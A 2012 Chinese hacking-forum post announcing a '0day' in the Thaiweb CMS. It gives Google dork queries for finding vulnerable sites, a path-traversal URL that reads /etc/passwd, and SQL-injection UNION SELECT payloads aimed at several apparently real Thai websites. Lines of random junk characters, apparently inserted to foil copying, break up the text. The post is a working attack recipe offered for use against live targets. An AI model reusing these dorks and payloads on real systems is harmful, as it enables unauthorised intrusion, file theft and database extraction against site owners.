中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
+ h% k/ U; t" }9 Y, r+ H- g/ d
% Y8 ]1 V: v4 i" U2 W7 d
intext:powered by Thaiweb
/ ?7 b2 s% ?2 _ I& C6 ?' s8 c
9 A5 S6 v7 ~8 t4 b
inurl:index.php?page=board.php
6 g0 Z6 `$ o! S/ H
6 U; I& z. x: y6 ~$ L, Y5 L7 a1 S
1 n' w% k$ `1 A+ \, b. D
' p3 W; z; _+ @5 D- i2 E
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
$ y: A- A& I/ V W
# L: m; }7 l+ l
& y6 x. @7 F. G; O% }! k
: \1 F" ]# E( p6 l, n$ f, c7 F
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
* r4 }0 S3 Z4 |1 b7 J
3 |0 P( T' I7 p/ @1 [
6 X2 `7 Z) ^1 |) P _5 q9 [
+ f+ `; ]; d. T( H! v7 c$ z
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# F$ i D* a; o% d
$ w# K& {) O1 ?0 U/ ?1 M9 Z
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
; _. I4 d6 {8 z/ Q3 S( p$ l/ n
4 V) R' v) X1 V$ D+ Z4 J5 Q' |" ]0 h
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
' E f4 @! ^+ `3 a8 v: v5 Q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2